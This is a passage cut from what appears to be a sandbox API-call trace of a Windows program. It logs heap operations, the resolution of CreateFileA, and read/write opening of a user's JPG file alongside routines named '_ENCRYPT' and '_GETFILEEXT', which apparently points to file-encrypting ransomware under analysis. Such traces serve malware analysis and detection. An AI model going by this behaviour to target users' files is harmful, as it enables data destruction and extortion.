Size=0x4) returned 0x7af5b8 [0041.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0041.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0041.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0041.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.154] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0041.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8897c0 [0041.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8897c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0041.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0041.154] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0041.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0041.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0041.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897c0 [0041.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x8897c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0041.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0041.155] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0041.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0041.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0041.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0041.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0041.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0041.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0041.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0041.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3f) returned 0x7ab260 [0041.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg", cchWideChar=63, lpMultiByteStr=0x7ab260, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg", lpUsedDefaultChar=0x0) returned 63 [0041.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.156] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0\\jynlg9.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0041.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0041.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0041.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0041.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0041.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0041.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0041.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0041.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0041.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0041.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=63, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0041.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7e) returned 0x7d5bb8 [0041.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=63, lpWideCharStr=0x7d5bb8, cchWideChar=63 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg") returned 63 [0041.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0041.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0041.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0041.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0041.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0041.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0041.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0041.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0041.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0041.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0041.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0041.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0041.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0041.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0041.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0041.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0041.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0041.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0041.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0041.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0041.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0041.158] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0041.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0041.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0041.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0041.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0041.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0041.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0041.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0041.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0041.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0041.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0041.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0041.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0041.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0041.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0041.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0041.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0041.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0041.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0041.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0041.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0041.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.160] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.160] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.160] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0041.160] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.160] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0041.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0041.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0041.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0041.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0041.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0041.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0041.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0041.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0041.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0041.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0041.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.160] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.160] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0041.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0041.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0041.161] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.161] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0041.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0041.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0041.161] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.161] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0041.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.161] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0041.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0041.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0041.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0041.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0041.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0041.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0041.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.161] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.161] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.162] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.162] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1a011c0, ftCreationTime.dwHighDateTime=0x1d5b774, ftLastAccessTime.dwLowDateTime=0x10c4ba0, ftLastAccessTime.dwHighDateTime=0x1d5b921, ftLastWriteTime.dwLowDateTime=0x10c4ba0, ftLastWriteTime.dwHighDateTime=0x1d5b921, nFileSizeHigh=0x0, nFileSizeLow=0x56fe, dwReserved0=0x0, dwReserved1=0x777648, cFileName="jyNlG9.jpg", cAlternateFileName="")) returned 0x7c20c0 [0041.162] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0041.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0041.162] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.162] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1a011c0, ftCreationTime.dwHighDateTime=0x1d5b774, ftLastAccessTime.dwLowDateTime=0x10c4ba0, ftLastAccessTime.dwHighDateTime=0x1d5b921, ftLastWriteTime.dwLowDateTime=0x10c4ba0, ftLastWriteTime.dwHighDateTime=0x1d5b921, nFileSizeHigh=0x0, nFileSizeLow=0x56fe, dwReserved0=0x0, dwReserved1=0x777648, cFileName="jyNlG9.jpg", cAlternateFileName="")) returned 0x7c20c0 [0041.162] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0041.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0041.162] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.162] CompareStringW 